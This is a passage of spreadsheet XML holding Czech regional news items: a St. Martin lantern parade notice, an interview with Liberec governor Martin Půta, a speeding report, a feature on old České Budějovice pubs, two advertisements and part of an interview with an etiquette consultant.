    <t>„Už Martin na bílém koni, už zase přijíždí k nám …“ Svatý Martin , římský voják, poustevník a biskup v Tours , patron vojáků, koní, kovářů a vinařů, byl prvním světcem, který byl svatořečen pro svůj příkladný život, a ne jako mučedník. Proslul svým projevem lásky k bližnímu. Jednoho mrazivého zimního večera jel Martin do vojenského tábora v Galii ( Francie ). U městské brány ho oslovil nuzně oděný žebrák a prosil o almužnu. Martin u sebe neměl nic, čím by ho obdaroval. Rozdělil tedy alespoň mečem svůj důstojnický plášť a polovinu promrzlému chudákovi věnoval. Legenda dále vypráví, že v noci uviděl Martin ve snu Ježíše Krista oděného polovinou jeho pláště... Svátek svatého Martina si mnozí spojují s prvním sněhem, pečením martinských rohlíků, ochutnávkou mladého vína a s vypečenou šťavnatou husou. ZŠ I. Olbrachta tento oblíbený svátek připomene tradičním, již desátým, průvodem lampionů a lucerniček z Komenského náměstí na Ostrov . Zváni jsou malí i velcí světlonoši z celých Semil a okolí! Autor: Za ZŠ I. Olbrachta Lucie Horáková Autor person Lucie Horáková</t>
  </si>
  <si>
    <t>20241101_655_3239765078_fdd13137127e7b92f166.html</t>
  </si>
  <si>
    <t>fdd13137127e7b92f166</t>
  </si>
  <si>
    <t>Tajemná řeč genů</t>
  </si>
  <si>
    <t>Tajemná řeč genů Rozhovor s genetikem Eduardem Kejnovským Ivana Karásková Věděli jste, že se geneticky téměř nelišíme od šimpanzů? Proč někomu nechutná pivo nebo kapusta a proč málokdo dokáže stočit jazyk do ruličky? Jak to mají se sexem Inuité a čím to, že si sourozenci často nebývají vůbec podobní? Genetik Eduard Kejnovský čtenáře seznamuje s genetikou a molekulární biologií. V rozhovorech s novinářkou Ivanou Karáskovou přináší odpovědi na zajímavé otázky a věnuje se i kontroverzním tématům, jako je eugenika či genetické modifikace. Čtenář se dozví, jak geny ovlivňují naši povahu, inteligenci i dědičné nemoci, a jaké etické otázky přináší pokrok v reprodukční medicíně. 256 str., váz., 399 Kč Nakladatelství TRITON, s.r.o. www.tridistri.cz</t>
  </si>
  <si>
    <t>10000</t>
  </si>
  <si>
    <t>20241101_656_3239774414_254057f5e5a1154e6361.html</t>
  </si>
  <si>
    <t>254057f5e5a1154e6361</t>
  </si>
  <si>
    <t>Půta: Snažím se udržet si vazbu na lidi mimo politiku</t>
  </si>
  <si>
    <t>Půta: Snažím se udržet si vazbu na lidi mimo politiku Martin Půta (53 let) je od roku 2012 hejtmanem Libereckého kraje . Do politiky vstoupil v roce 2002, kdy byl zvolen starostou Hrádku nad Nisou , v roce 2017 byl krátce poslancem Poslanecké sněmovny Parlamentu České republiky . Od roku 2005 je členem Rady Euroregionu Nisa a v roce 2011 se stal jeho předsedou. Od roku 2014 je místopředsedou Asociace krajů České republiky. Aktuálně je předsedou hnutí Starostové pro Liberecký kraj . Martin Půta žije v Hrádku nad Nisou , je ženatý a má tři dcery. Pane hejtmane, jak se změnil Martin Půta od svého prvního funkčního období? Především je o 12 let starší. Ale jinak jsem, myslím, uvnitř stále stejný člověk. Životní optimista, někdy i trochu naivní v tom, že věřím lidem, že dělají to, co říkají. A zároveň dnes i trochu klidnější. Vím, že si nemůžu namlouvat, že věci, které považuji za správné, se automaticky stanou jen proto, že jsem hejtman. Pochopil jsem, že všechny věci se zařídit nedají. Jste tedy pragmatičtější? Možná ano. Říkám si, že člověk se nemá utopit v mikromanagementu a řešit úplně všechno. Takže se spíš snažím říkat, co si o věcech myslím, a ti, co to mají na odpovědnost, to pak použijí, nebo ne. A méně se rozčiluju kvůli detailům, protože jsem pochopil, že to nemá smysl. Co byste odpověděl lidem, kteří se drží klišé, že politika je jen špína? Odpověď je jednoduchá: vždycky je to o tom, jestli jít „českou“ cestou, to znamená jen sedět u piva a nadávat, jak je v celé zemi všechno špatně a nic nefunguje, nebo se občas odhodlat udělat něco, o čem si myslím, že je správné a bude to fungovat lépe. Za mě by ta cesta směrem nahoru měla začínat už od komunální politiky. Vždycky, když vyplavou nové politické superstar, které v politice ani ve veřejném prostoru ještě nic neudělaly, dívám se na ně s opatrností. Myslím, že jen zkušenost, jak lidé fungují na místní a regionální úrovni, může být měřítkem, co od nich očekávat, když se z nich stanou poslanci nebo ministři. Takže všichni, co říkají, že politika je špína, poněkud „zmenšují hřiště“ – a pak se do politiky spousta slušných lidí nehlásí. Místo aby přirozeně třeba zasedli v zastupitelstvech, podléhají obrázku naprostého zmaru živeného do značné míry i médii. Články o katastrofách a nehodách jsou bohužel čtenější než o tom, že se někde povedl projekt, který vylepšil veřejné služby, nic se na něm neukradlo a všichni jsou s ním spokojení. Lidé bohužel víc věří drbům než realitě. Vzpomenete si na ten moment, kdy jste se rozhodl „vstát od hospodského stolu“ a jít do politiky? Ano. Mimochodem, bylo to opravdu v hospodě. V roce 2001 jsme v Hrádku nad Nisou řešili veřejný spor. Tehdejší vedení města chtělo postavit novou cestu, která by zjednodušila dopravu, ale měla vést přes městský park. Mně se to nelíbilo a vedle toho vznikla proti záměru i petice, kterou podepsalo 2 tisíce lidí. Shora přišla odpověď, že pár zahrádkářů nebude určovat, kam směřuje město. Byla to rétorika jak za komunistů. Podíval jsem se tehdy na hlasy v komunálních volbách a zjistil absurditu, že lidé, kteří takhle shazují legitimitu petice 2 tisíc lidí, sami nedostali ani tisíc hlasů. Tak jsme si s pár známými řekli, jestli nepůjdeme kandidovat do zastupitelstva, aby se jen všichni neplácali po ramenou, ale aby zazníval také kritický hlas. No a za rok jsme ty volby vyhráli. V hospodě jsem pak říkal: „Co budeme dělat, když jsme ty volby vyhráli?“ Odpověď byla: „Teď musíš dělat starostu, když jsi do toho šel…“ Na tenhle začátek a lidi, kteří do toho s námi tenkrát šli, se snažím nezapomínat. V tom smyslu, že když za mnou přijdou s tím, že si myslí, že něco funguje nebo směřuje špatně, snažím se je poslouchat a přemýšlet o jejich argumentech. Čím déle člověk v politice je, tím je důležitější i těžší zároveň mít stále vazbu na lidi, kteří vůbec v politice nejsou a jsou ochotni vám říkat, co si myslí. Tohle jak člověk ztratí, ocitne se v neexistujícím světě a podle toho pak občas vypadá i rozhodování na té nejvyšší úrovni. Po ustavujícím zastupitelstvu pravděpodobně vstoupíte už do svého čtvrtého funkčního období v pozici hejtmana Libereckého kraje. Jak se ale zároveň dokážete ubránit syndromu „regionálního kultu osobnosti“? Lidem, kteří si to myslí, se snažím vysvětlovat, že to tak není. Když jste starosta nebo hejtman, píšou vám lidé, kteří už nevědí, kdo jejich problém může řešit. Často si do politiků projektují svá očekávání spásy v nějaké životní situaci. Pak je složité vysvětlovat, že jako hejtman nejsem nadřízený starosty nebo nemůžu zvednout telefon a zavolat například na úřad práce, že paní Novákové je potřeba vyhovět, protože mi napsala e-mail. Tohle ani není specifikum Libereckého kraje , ale funguje to obecně. Pro mě je důležité mít napojení na normální lidi, pro které jsem stále ten Martin Půta , jak ho znali před jakoukoli politickou funkcí. Dodnes chodím v Hrádku pravidelně s okruhem přátel na pivo , kde se scházejí lidé s naprosto odlišnými názory. Od nich pak často zaznívají jasné pozice vůči tomu, co dělám, a občas to pak bývá zajímavé… Ale tohle je potřeba si v politice udržet. Kdybyste ze dne na den musel odejít od rozdělané práce na kraji, co by vás nejvíce mrzelo, že jste nestihl? Těch projektů je hodně a nebudu jmenovat jeden konkrétní. Člověk v téhle pozici to ale musí mít nastavené tak, že i když tady nebude, má projekty natolik rozjeté, aby alespoň některé dopadly dobře. Když člověk vyhraje volby, je to proto, že část veřejnosti si do něj projektuje své představy, jak by věci měly fungovat. Takže spíš by mě mrzelo, že bych nenaplnil očekávání lidí a slib, že pro ně budu pracovat. Bylo by mi líto, že jsem nevyužil všechny svoje znalosti o kraji, protože za těch 12 let ho mám navnímaný do velkých detailů. Na druhou stranu, muž nad padesát musí být připravený na to, že zdraví a síly nejsou nekonečné a je třeba být pokorný k tomu, kolik na co máme času. Nejde jen optimisticky předpokládat, že co jsem nestihl letos, udělám za rok nebo za pět let. Lidé často nevědí, že hejtman nemá výkonnou moc. Ale člověk v téhle pozici může na věci upozorňovat, chválit, navrhovat nebo se snažit je posunout jednáními. Tady mám na mysli třeba velké akce, kde kraj není investor: silnice, vlaky, velké investice, které jsou ale pro život lidí v kraji z dlouhodobého hlediska zásadní. Jeden projekt ale přece jen zmíním, a to je Ještěd. O něm se intenzivně debatuje a už dlouho hledáme cestu, aby se tahle stavba z roku 1973 opravila. Projektanti, kteří dělali studii pro Národní památkový ústav, situaci Ještědu přirovnali k autu, které odstavíte na místě, kde je stále extrémní počasí. A podle toho po letech vypadá. Začínáme tedy vyjednávat o odkupu od současného vlastníka, Českých radiokomunikací. Oni Ještěd vnímají jako pouhý vysílač, přitom je to jedna z nejikoničtějších staveb celé České republiky , ověnčená Perretovou cenou, a my bychom neradi přihlíželi její další degradaci. Dlouhodobý cíl, který vznikl ještě předtím, než jsem na kraj přišel, je, aby byl Ještěd zapsán na seznam UNESCO. Odkup a rekonstrukce by se měly vejít do jedné miliardy. Sehnat tedy peníze na opravu a posunut to do stadia, kdy už to nepůjde zvrátit, byl jeden z úkolů, který mě také motivoval jít ještě jednou do voleb. Když jsme u takhle zásadních projektů, kdy se Liberečané svezou přímým vlakovým spojem do Prahy ? Správa železnic to má naplánované na rok 2033. Je to takto uvedené i ve strategii sektorové dopravy, schválené ministerstvem dopravy. Věřím, že tenhle optimistický předpoklad není příliš vzdálený od reality, a občas žertem říkám, že si dávám jako jeden ze svých cílů, že se za tu zhruba hodinu do centra Prahy jednou svezu a bude to ještě ve věku, kdy si budu pamatovat, proč jsem do toho vlaku nastoupil a proč z něj vystupuju. Přitom z pohledu vývoje dopravy nemůžeme bez rychlého vlakového spojení nikdy naplnit emisní očekávání. Komfortem a rychlostí je to jediná srovnatelná alternativa, jak přimět lidi, aby přesedli z aut do vlaku. Od roku 1990 vzniklo několik studií proveditelnosti trasy mezi Libercem a Prahou , ale až ta poslední dopadla dobře. Máme na stole trasu, kde by se jezdilo rychlostí 200 km/h, což je ve srovnání se západními státy standardní trať, která není nákladově tak drahá jako tratě vysokorychlostní. Tohle je zrovna příklad toho, že kdyby kraj neexistoval a politická reprezentace by na ten projekt netlačila, nejméně dalších 50 let by to nikdo neřešil. Role hejtmana musí sebrat hodně energie. Jak relaxujete? Čím jsem starší, je to méně sportu a více zahrady. Máme středně velkou zahradu, na které se zrovna chystám vysadit nové jabloně a ořechy, a když tam zrovna žádná práce není, nějakou novou vymyslím. Bydlím na malém městě a mám to 3 kilometry na krásný zatopený lom Kristýna, takže tam jezdím na kole a zaplavat si. A čtu si. Tedy snažím se číst i něco jiného než materiály zastupitelstva a občas se mi to i daří. Jak by vás nejspíše charakterizovaly vaše děti? To je složité. Těm dvěma velkým (dcerám) je už 19 a 20 let a jsou to samostatně uvažující jednotky s volebním právem. Pak mám devítiletou dceru, která je ještě ve věku, kdy tatínek má vždycky pravdu, takže ta by mě nejspíš chválila. Ze včerejška mám čerstvou pochvalu, že se mi hezky povedlo podle návodu vyřezat dýni na Halloween, co měla přinést do školy. Ale určitě by si i stěžovala, že jsem málo doma a nestihnu chodit na všechny její koncerty v rámci ZUŠ, kde děti nejvíc prožívají, jestli tam maminka s tatínkem oba jsou. Také jsem teď zažil jinou otcovskou radost, když se nejstarší dcera dostala na vysokou školu, na jakou chtěla. Člověku dojde teprve ve věku, kdy jsou už děti takhle velké, že tohle je vlastně to nejdůležitější. Aby se dětem dařilo. A když pro ně už nic udělat nemůže, alespoň je nějak nasměruje. A udělalo mi radost třeba i to, když byly dcery na sčítání volebních výsledků, že byly spokojené, jak to dopadlo. Fandily mi. Když jsme pak měli povolební vyjednávání, dostal jsem od nich vzkaz, že jedna z těch koaličních variant by se jim vůbec nelíbila. Prostřední dcera mi řekla: „Zajímalo by mě, jak bys to vysvětloval svým voličům. Třeba mně.“ Mimochodem, šlo o velkou koalici s ANO. Máte nějaký nesplněný sen? Své ženě slibuji, že pojedeme na nějakou delší než týdenní dovolenou. Takže si dávám úkol, že v prvním roce svého volebního období bych rád něco takového udělal, vypnul telefon a nic neřešil. Jako jeden z pracovních cílů totiž mám víc delegovat úkoly na své radní a náměstky. Kam pojedeme, většinou navrhuje manželka a já to jen odsouhlasím. Pravidelně jezdíme do Chorvatska , letos tam ovšem rodina strávila čtrnáct dnů a já čtyři, přičemž jsem se snažil předstírat, že jsem byl s nimi na dovolené. Na ty vysněné dva týdny by to bylo spíš než do exotiky asi znovu do Chorvatska . Rádi jezdíme i do Polska , protože manželka je Polka. Možná vymyslí nějakou cestu po polských městech, kde jsme ještě nebyli. MARTIN PŮTA JE MÍSTOPŘEDSEDOU ASOCIACE KRAJŮ ČESKÉ REPUBLIKY , OD ROKU 2012 JE HEJTMANEM LIBERECKÉHO KRAJE. JE ŽENATÝ A MÁ TŘI DĚTI. LIBERECKÝ KRAJ ZAČÍNÁ JEDNAT O ODKUPU VYSÍLAČE NA JEŠTĚDU, PENÍZE BY RÁD SEHNAL TAKÉ NA OPRAVU TÉTO IKONICKÉ STAVBY. DLOUHODOBÝ CÍL KRAJE JE, ABY BYL JEŠTĚD ZAPSÁN NA PRESTIŽNÍ SEZNAM UNESCO.</t>
  </si>
  <si>
    <t>20460</t>
  </si>
  <si>
    <t>20241101_657_3239768869_6932345c763f461c567b.html</t>
  </si>
  <si>
    <t>6932345c763f461c567b</t>
  </si>
  <si>
    <t>Za rychlou jízdu šoférovi Audi rovnou na místě sebrali řidičák</t>
  </si>
  <si>
    <t>Za rychlou jízdu šoférovi Audi rovnou na místě sebrali řidičák VELKÝ BERANOV (kra) - Za příliš rychlou jízdu přišel minulý týden v pondělí šofér (42) rovnou o řidičský průkaz. Za volantem osobního vozu Audi projížděl po dálnici D1 nedaleko Velkého Beranova rychlostí 203 kilometrů v hodině. Bylo krátce po desáté hodině dopoledne, když na 117,5 kilometru dálnice ve směru na Brno řidičovu jízdu zachytil radar policejní Škody Superb. Nejvyšší povolená rychlost v daném úseku přitom byla 130 kilometrů v hodině. „Vzhledem k tomu, že řidič překročil rychlost mimo obec o více než 50 km/h, nebylo možné přestupek vyřešit na místě v příkazním řízení a policisté mu zadrželi řidičský průkaz,“ sdělila mluvčí policistů na Vysočině Dana Čírtková. Přestupek se bude řešit ve správním řízení. Dechová zkouška u řidiče na alkohol byla negativní. Možnost zadržet na místě řidičský průkaz při vysokém překročení rychlosti dává policistům novela zákona o provozu na pozemních komunikacích, která je účinná od ledna letošního roku. Pokud řidič při řízení vozidla překročí nejvyšší dovolenou rychlost v obci o 40 km/h a více a mimo obec o 50 km/h a více, musí počítat s tím, že mu policisté na místě zadrží řidičský průkaz a jeho přestupek se bude řešit ve správním řízení, kde mu hrozí pokuta až 25.000 korun, zákaz řízení na šest až 18 měsíců a v rámci bodového systému dostane ještě také celkem šest trestných bodů. BEZ ŘIDIČSKÉHO průkazu se bude muset nějaký čas obejít řidič osobního vozu značky Audi , který po dálnici D1 u Velkého Beranova jel příliš rychle. Nejvyšší povolenou rychlost překročil o 73 kilometrů v hodině. Radar mu naměřil 203 kilometrů v hodině. Foto: PČR</t>
  </si>
  <si>
    <t>20241101_658_3239760120_e5132d72a3fe0dc9e6dd.html</t>
  </si>
  <si>
    <t>e5132d72a3fe0dc9e6dd</t>
  </si>
  <si>
    <t>U Zvonu i Černého koníčka se pije staletí</t>
  </si>
  <si>
    <t>U Zvonu i Černého koníčka se pije staletí Zajímá vás, jaká je nejstarší budějovická hospoda? A do které i dnes můžete zajít na pivo či na jídlo? Opravdoví rekordmani píší svou historii už řadu století. Nezajdeme na jedno? Věta, kterou už slyšel či řekl snad každý. Nenechte se proto dlouho pobízet a pojďte se snámi „osvěžit“ pivem . Tentokrát se projdeme po Českých Budějovicích , kde budeme hledat ty vůbec nejstarší hostince, hospůdky či restaurace. A kde jinde začít než v samotném středu krajského města. Na náměstí Přemysla Otakara II. Právě tady můžeme najít jeden z nejstarších městských hostinců. Dnes stojí na východní straně náměstí honosný hotel Zvon, kam míří řada štamgastů na parádně ošetřenou a čepovanou plzeň. Historie tamního zařízení sahá až do 30. let 16. století, kdy poprvé o hostinci U Zvonu nacházíme písemné zmínky. V minulosti tu bývaly hospody hned dvě, apěkně vedle sebe. U Tří kohoutů a U Tří zvonků. U Tří kohoutů například v září roku 1768 přenocoval i císař Josef II. Až v první polovině dvacátého století se oba hostince spojili a dodnes tvoří hotelový komplex Zvon. Půjdeme se podívat i do druhé nejstarší hospody v Budějovicích . A tady si pro změnu dáme jedno protivínské. Ano, vcházíme po jednom schodu do hostince U Černého koníčka na dnešní Žižkově třídě. Tady na nás dýchne atmosféra časů dávno minulých, prvorepublikových. „Zájezdní hostinec tu fungoval už od roku 1560. I když původní hospoda stávala blíže k dnešnímu rohu s Jeronýmovou ulicí, tam, kde nyní sídlí českobudějovický magistrát. Potom, co palác i sousední dům koupil v roce 1869 kníže Schwarzenberg, hostinec přesunul. „Ale beru to jako jeden podnik, protože název zůstal po staletí stejný,“ zmiňuje regionální archivář a historik Daniel Kovář . Ke svému jménu hostinec přišel nejspíš tak, že tu hostinský měl kdysi povinnost ustájit i koně hostů. Vždyť tu také přespávali formani na cestách z Trhových Svinů , Nových Hradů či směrem od Vídně . A když nestihli čas, kdy se zavírali budějovické brány v městských hradbách, museli přenocovat právě U Koníčka. A přesuneme se zase na druhou stranu města. I tady je historie restaurace spjatá s koňmi. Když přejdeme park Na Sadech směrem k Dlouhému mostu, tak na Husově třídě najdeme dům U Zelené ratolesti. Ta je tedy zřejmě třetí nejstarší fungující hospodou v Budějovicích . První písemná zmínka je z roku 1763, a jak už jistě tušíte, „Ratolest“ je pevně spojená s koněspřežnou dráhou. Stáje tehdejší zájezdní hospody nechali později podnikatelé Lannovi přestavět pro potřeby dráhy, která odtud vedla do rakouského Lince. Dnes vám v klasicistní budově načepují plzeň či kozla. To byly tři nejstarší podniky ve městě, kde se dalo najíst a napít. Budějovice mají však mnoho dalších hostinců, kde se pije, slaví, hoduje či veselí už třeba sto let. Mnohdy i víc. „Například hostinec Šumava v dnešní Lipenské ulici na Pražském předměstí se otevřel v roce 1900 a dodnes funguje. Podobně stará je například i hospoda na Palackého náměstí U Kalicha,“ doplňuje Daniel Kovář . A my můžeme pokračovat dál, třeba na budvar ke Zlaté Hvězdě na Husově třídě. Anebo na druhou stranu Budějovic na Lidickou třídu. V Rožnově už bude historie také sahat ke stu letům v hostinci U Města Krumlova. Podniku, který stojí na rohu Lidické a ulice Antala Staška se dříve říkalo U Jiroušků, měl dříve i větší sál, nad kterým hrávala živá hudba. Dnes si tu můžeme dát budvar a něco dobrého k jídlu. Co by to bylo za procházku po historii českobudějovických putyk a náleven, které fungují dodnes, kdybychom vynechali asi tu nejznámější. Ano jsou to Masné krámy. Ty nedávno oslavily sedmdesát let od založení. Pivnicí za den projdou stovky návštěvníků, vytočí se tu tisíce piv . Specialitou podniku je kroužkovaný ležák Budvar čepovaný z obřích tanků. Víte však, že chybělo málo a hospoda by na rohu Krajinské a Hroznové vůbec nestála? Po roce 1945 padaly i takové návrhy, že by se celá a tehdy zchátralá budova z druhé poloviny 16. století mohla zbourat. Masné krámy však přežily a dodnes se stávají častým místem návštěv zahraničních turistů, ale i místních štamgastů. Ještě po povodních v roce 2002 zůstaly Masné krámy na pět let uzavřené, a to kvůli vleklým sporům s majiteli a stavebním úpravám. Dnes sem zamíří desetitisíce návštěvníků ročně a servírky a číšníci tu například nachodí za celodenní směnu něco mezi patnácti a dvaceti kilometry. A za rok tu přibližně načepují přes tři sta tisíc půllitrů budvarských piv . HOSTINEC U ČERNÉHO KONÍČKA ZNÁMÁ RESTAURACE SE NACHÁZÍ NA DNEŠNÍ ŽIŽKOVĚ TŘÍDĚ. ČEPUJÍ TAM PROTIVÍNSKÝ PLATAN, ALE PRAVIDELNĚ I RŮZNÉ SPECIÁLY. HOTEL ZVON KOMPLEX VÍCE BUDOV ZABÍRÁ VELKOU ČÁST HLAVNÍHO NÁMĚSTÍ. TADY UŽ 110 LET „NOVODOBÁ“ HISTORIE SE U KONÍČKA PÍŠE OD ROKU 1910. MASNÉ KRÁMY LEGENDÁRNÍ PIVNICE LETOS OSLAVILA 70 LET EXISTENCE, NENÍ TAK V BUDĚJOVICÍCH NEJSTARŠÍ, ALE URČITĚ NEJZNÁMĚJŠÍ. Autor: TEXT: PETR LUNDÁK FOTO: PETR LUNDÁK A ARCHIV MAFRA Autor person Petr Lundák</t>
  </si>
  <si>
    <t>24380</t>
  </si>
  <si>
    <t>20241101_659_3239760121_b39146448cf11cd6ff57.html</t>
  </si>
  <si>
    <t>b39146448cf11cd6ff57</t>
  </si>
  <si>
    <t>RESTAURACE</t>
  </si>
  <si>
    <t>RESTAURACE Rubrika: INZERCE NÁŠ PŘÍBĚH Protože jsme jihočeští patrioti, ctíme tradice a jsme zvyklí dělat věci poctivě a s láskou, rozhodli jsme se vnuknout chátrající historické budově solnice znovu život a ruch, který ji v daleké minulosti provázel. Byla by škoda nechat tento skvost lidem uzavřený. Proto jsme provedli důkladnou rekonstrukci od sklepa až po půdu s velkým důrazem na maximální zachování autentičnosti a původních prvků. Věříme, že se nám tato nákladná a mravenčí práce podařila. Ostatně důkazem jsou i různá ocenění, jako např. „Stavba roku 2019", kterých si vážíme. Naším cílem je, aby prostory Solnice sloužily k setkávání a kvalitně prožitému času ať už v naší restauraci, tak i v ostatních prostorách Solnice vhodných pro vaše různé společenské aktivity. Aby toho nebylo málo, vyrábíme a čepujeme vlastní pivo . HISTORIE BUDOVY SOLNICE Gotická budova SOLNICE se čtvrtým nejstarším krovem svého druhu v České republice byla postavena v roce 1531 jako městská sýpka. Později se zde skladovaly zbraně a před rokem 1880 sůl. Kvůli účelu skladování zde nikdy neproběhly žádné větší stavební úpravy. Zásadní rekonstrukce se budova dočkala až v 21. století, kdy zde 29. března 2019 byla slavnostně otevřena restaurace SOLNICE. NÁŠ PIVOVAR Pivovar vznikl na základě myšlenky, jak mít pivo rychle a neomezeně k dispozici pro naše milé hosty v restauraci Solnice. Chtěli jsme se také vyhnout nešetrné manipulaci a překládce při převozu, které negativně ovlivňují kvalitu piva . Naše pivo si hýčkáme od samého počátku jeho vzniku, při skladování a „proudění“ přímo do výčepu. Pivovar Solnice byl založen roku 2018 v samotném historickém centru Českých Budějovic . Na štítu budovy se vyjímá obraz sv. Václava , patrona českého piva a sládků. Pivo je u nás připravováno s akcentem na nejvyšší standard surovin v technologiích renomovaného výrobce Kaspar Schulz. Pivo SOLNICE ze stejnojmenného pivovaru v Hroznové ulici je do restaurace SOLNICE dopravováno unikátním podzemním pivovodem pod Piaristickým náměstím . Na kvalitu piva dohlíží mistr svého oboru, pan Ivan Dufek, člen Síně slávy českého pivovarství a sladařství. Všechna piva vyráběná v pivovaru Solnice splňují kritéria pro označení „České pivo “. Jsou nefiltrovaná a nepasterovaná. Piaristické náměstí 3 370 01 České Budějovice 1 tel.: 777 357 120 www.restauracesolnice.cz Pivo nad zlato Rubrika transition_slide INZERCE</t>
  </si>
  <si>
    <t>20241101_66_3250214363_db2d465b83746223ed97.html</t>
  </si>
  <si>
    <t>db2d465b83746223ed97</t>
  </si>
  <si>
    <t>Bohatí lidé si chtějí užívat dekadentní párty, ty však nejsou jen o sexu. Roli hrají vůně a detaily</t>
  </si>
  <si>
    <t>Bohatí lidé si chtějí užívat dekadentní párty, ty však nejsou jen o sexu. Roli hrají vůně a detaily -S každým se chováš jinak. Vždyť to jsou taky masky. To jsou role společnosti, které ten člověk má. A je jenom na nás, jestli zvolíme ten správný tón s tím člověkem. Byznysová linka vypadá jinak, než když s ním půjdu do O2 areny na hokej. Jo, jakože jsou to různé světy. Takže já si, jako přetvářka, ano, je stejně tak ta manipulace, ovlivňování, to všechno k tomu jako je. Ty rozdáš to vizitek, kde jsou údaje od email, fax pomalu tam ještě je, adresa, velké logo, je to papír, na který se nedá napsat žádná poznámka nebo nic. Je to takové prostě křída, lesk. Vizitka stálá 2,50. Tak to radši nedávají žádnou vizitku za mě, ale když už dáváš vizitku, tak si s ní můžeš vyhrát a já vím, že když se člověkovi věnuju aspoň jako 20 minut na tom networkingu nebo na nějaké té akci a budu mu dávat vizitku, tak jsem si jistý, že si moji vizitku jako zapamatuje. Protože mám jako soft touch papír. Je to navoněné, je tam zlatá ražba a rukou dopsané moje jméno a číslo. -Tady Jiří Bém, Focuson.cz a pořad Big Deal a Denis Tureček. Já teď přemýšlím, jak tě představit, jestli nějaký jako expert na komunikaci, vyjednávání, možná bych to nechal na tobě, co vlastně jako jsi? -Co jsem. Já se snažím věnovat jako obecně komunikaci. Ať už je to etiketa, což je vlastně forma nějaké neverbální komunikace, ať už je to ten proslov, ta rétorika ovlivňování, manipulace, vyjednávání, to všechno za mě spadá prostě do jako balíčku komunikace. A někdo se věnuje víc jednomu tématu, někdo víc druhému, já to mám rád jako v takovém tom prostě (???) picture. Takže celkově kolem komunikace se rád točím. -Ty sis prošel jako zajímavou cestou, když jsi mi o tom povídal nebo psal. Krupiér přes krejčovství až k té nynější pozice nějaké jako komunikace. To je zajímavý jako příběh. Mohl bys to nějak zjednodušit? Jak se ti to stalo? -Jak se mi to stalo? Stalo se mi to ve druháku na střední, na gymplu, kdy jsem se na konci léta šíleně nudil. A říkal jsem si, že to musím nějakým způsobem zlomit a našel jsem pražský studentský summit. Tak jsem se tam přihlásil, dostal jsem se tam a v ten moment se mi změnil život v nejlepším slova smyslu, jak si ho můžeme představit. První školení od nějakých diplomatů, od tady protokolářů a spol., nějakým způsobem politika, diplomacie a mě to prostě bylo blízké. A díky tomu, že jsem se tam naučil chovat, tak vlastně se to prolínalo po tom, celým tím životem. I když jsem dělal krupiéra, tak mě vzali na základě toho, že já jsem se uměl chovat těm hráčům, když přišel nějaký VIP host, tak já jsem věděl, jakým způsobem se k němu chovat, aby to bylo na nějaké úrovni. Oni mě měli rádi a chtěli, abych tam byl častěji, tím pádem já jsem se potom dostal do té pozice, že jsem se staral o tady tyhle VIPka, potom jsem se stal šéfem kasina, jako že jsem měl na starosti ten poker. A oni tam chodívali, protože věděli, že se mnou je to prostředí jako dobré a není to jenom o tom, že přinesou peníze a nechejte to prostě na těch poplatcích a spol. A vlastně tam jsem vydržel nějakých 6-7 let, ale ono ten jako noční život není úplně slučitelný s tím rodinným životem nebo s tím vztahem, takže jsem se rozhodl, že s tím potřebuju skončit. Dal jsem přednost partnerce a v ten moment jako, a co teda budu dělat? No, uměl jsem se chovat, znal jsem tady tyhle základy, tak se mě kamarádka zeptala, jestli nechci dělat do jednoho krejčovství. Říkám si: Ty jo, ale já nejsem krejčí, jako já mám obě ruce levé, jako co s tím mám dělat? A to nevadí, ale ty víš, jako co znamená white tie, ty víš, co znamená black ti,e jako i dress code. Říkám: No, to vím. Zbytek tě doučíme. No, tak jsem začal pracoval v jednom krejčovství, tam potom proběhly nějaké strukturální změny, ale lidi už věděli, že já se tomu věnuju, tak jsem si založil svoje krejčovství, fungovalo to. A nějakým způsobem, řekněme, že nejsem úplně nejlepší byznysmen a byl jsem hodně mladý, takže jsem rozfofroval zleva doprava, kam to šlo. A nevyšlo to tím pádem, takže jsem shořel v nějakých 28, 29. Rok jsem dělal ve výrobě, to jsem poprvé začal pracovat rukama, 28, 29. Jsem rok pracoval rukama. Krásné to období, starali se tam o mě velmi hezky. -Já myslím, že to je důležité, když si člověk projde i takovouhle prací. -Jo, a tam to bylo kouzelné, protože když jsem si tam poslal životopis, tak mi na druhý den volal HRista, úžasný to muž. A říkal, že absolutně jako jsem mimo rámec té tabulky, jako o čem to je. Říkám: Já vím. A on: Aha, vy jste vyhořel, že? Říkám, přesně tak. Uděláme deal, vydržíte nám tady rok, protože vy za tři měsíce dostanete pocit, že už jste v pohodě, že už jste zdravý a potom na vás přijde ještě druhá vlna a vlastně se to znovu vyléčí, tak vás pustím, ale prostě vydržíte mi tady aspoň rok. Tak jsme si na to podali ruku. Rok jsem tam byl a fakt jako po třech měsících přišla vlna, kdy už jsem začal být sám sobě afektovaně arogantní, už jsem měl ten pocit, že už jdu zpátky nahoru. Tak si mě zavolal do kanceláře a řekl: Ty už rosteš, že? Říkám: Jo, už jsem v pohodě, už jsem zdravý. Tak mě trošku zklidnil a fakt ještě za měsíc přišla ještě jedna vlna, ta mě znovu dostal dolů, takže jsem byl rád, že tam byl jako osvícený člověk na své pozici, že mě tam ten rok udržel. A já jsem potom teprve mohl začít fungovat normálně, našel jsem si práci v Praze , protože já jsem předtím byl na Moravě , přestěhoval jsem se do Prahy a začala vlastně tady ta etuda komunikace. A celkově ovlivňování obchodu s informacema, jak to pojmenujeme, je vlastně jedno. -No, to je jako hrozně zajímavé. Já tomu furt nerozumím, co to jako znamená? Je to v podstatě o tom, že jako řekněme, že ten tvůj klient je někdo, kdo třeba chystá nějaký deal nebo obchod a potřebuje to jako dobře i zkomunikovat. Nejen, že si podepíšu nějakou smlouvu, ale jako i tak, jak spolu mluví ty dvě strany, jako je to, ono, je to, takhle si to, chápu to správně?-Je to i tady tohle, ano, chápeš to správně. Přesně o tom, že se někdo připravuje na velkou zakázku a nechce to podcenit, protože to můžou být spíš teda zahraniční lidi, protože v Čechách mezi sebou to umíme tu etiketu tak nějak jako všichni stejně špatně. Takže nikdo neudělá zas nějaké extra velké faux. Pokud se nebavíme o těch lidech v těch jiných kastách, jako ono pořád jako ta společnost je rozdělená, vrchní top 1 % je vrchní jedno top procento z nějakého důvodu to, a to se jako s těma, protože ti dole většinou jenom něco chtějí, oni nic nenabízí, oni jenom něco chtějí a když jdeš na akci, kde po tobě každý něco chce, tak jako proč tam jsi. Takže tím pádem oni si vybírají takové prostředí a takové akce, kde jim je dobře, kde jim je příjemně. A já se snažím potom i pro tady tyhle lidi vlastně tu akci udělat a vlastně připravuju pro ně ty eventy, aby se tam mohli oni normálně povídat a do toho přesně, hele, 